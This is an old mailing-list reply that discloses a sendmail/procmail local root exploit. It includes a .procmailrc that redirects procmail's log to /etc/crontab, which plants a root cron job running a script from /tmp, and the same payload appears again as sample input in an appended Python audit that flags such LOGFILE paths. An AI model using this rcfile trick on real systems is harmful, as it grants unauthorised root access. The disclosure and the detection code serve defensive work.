Subject: Re: Sendmail local root exploit on linux 2.2.x
From: Alan Iwi (iwi ATM.OX.AC.UK)
Date: Mon Jun 12 2000 - 04:28:14 CDT
- In reply to: Florian Heinz: "Sendmail local root exploit on linux 2.2.x"
- Reply: Alan Iwi: "Re: Sendmail local root exploit on linux 2.2.x"
> then create a .forward with:
> |/path/to/add
I tried this on an out-of-the-box Redhat 6.1 system.
In fact, on this system sendmail is configured to use
smrsh, which forbids piping mail to arbitrary programs
with .forward. But such systems are still vulnerable,
because sendmail is configured to run procmail. Just
change the exploit to use a .procmailrc file instead of
.forward. Here's an example:
LOGFILE=/etc/crontab
LOG="* * * * * root /tmp/my_dodgy_script.sh
"
LOGABSTRACT=no
:0
/dev/null
Alan
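
Added example, not part of the original message: a defensive audit that parses a user's .procmailrc and flags LOGFILE assignments that resolve outside that user's home directory, the pattern the rcfile above relies on. The sensitive-directory list, the function names and the /home/alice path are assumptions made for illustration.

```python
import os
import re

# Assumed policy: places a per-user procmail log has no business writing to.
SENSITIVE_DIRS = ("/etc", "/var/spool/cron", "/root", "/boot", "/bin", "/sbin", "/usr", "/lib")
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.*)$')

# The rcfile quoted in the message above, kept as sample input.
SAMPLE_FROM_POST = (
    'LOGFILE=/etc/crontab\n'
    'LOG="* * * * * root /tmp/my_dodgy_script.sh\n'
    '"\n'
    'LOGABSTRACT=no\n'
    ':0\n'
    '/dev/null\n'
)

def parse_assignments(text):
    """Yield (name, value) for VAR=value lines, joining multi-line quoted values."""
    lines = iter(text.splitlines())
    for line in lines:
        m = ASSIGN.match(line)
        if not m:
            continue  # recipe flags, conditions, actions, comments
        name, value = m.groups()
        while value.count('"') % 2 == 1:  # open quote: value continues on next line
            nxt = next(lines, None)
            if nxt is None:
                break
            value += "\n" + nxt
        yield name, value.strip().strip('"')

def under(path, root):
    return path == root or path.startswith(root.rstrip("/") + "/")

def audit_procmailrc(text, home):
    """Return [(severity, resolved_path)] for LOGFILE targets outside `home`."""
    env, findings = {"HOME": home}, []
    for name, value in parse_assignments(text):
        # Expand $VAR / ${VAR} from earlier assignments in the same file.
        value = re.sub(r'\$\{?(\w+)\}?', lambda m: env.get(m.group(1), m.group(0)), value)
        env[name] = value
        if name != "LOGFILE" or value in ("", "/dev/null"):
            continue
        # Relative paths resolve against MAILDIR, which defaults to $HOME.
        path = os.path.normpath(os.path.join(env.get("MAILDIR", home), value))
        if not under(path, os.path.normpath(home)):
            sev = "high" if any(under(path, d) for d in SENSITIVE_DIRS) else "review"
            findings.append((sev, path))
    return findings  # lexical check only: symlinks inside home are not resolved
```

Calling audit_procmailrc(SAMPLE_FROM_POST, "/home/alice") reports the /etc/crontab target as "high"; a LOGFILE under the user's own mail directory produces no finding.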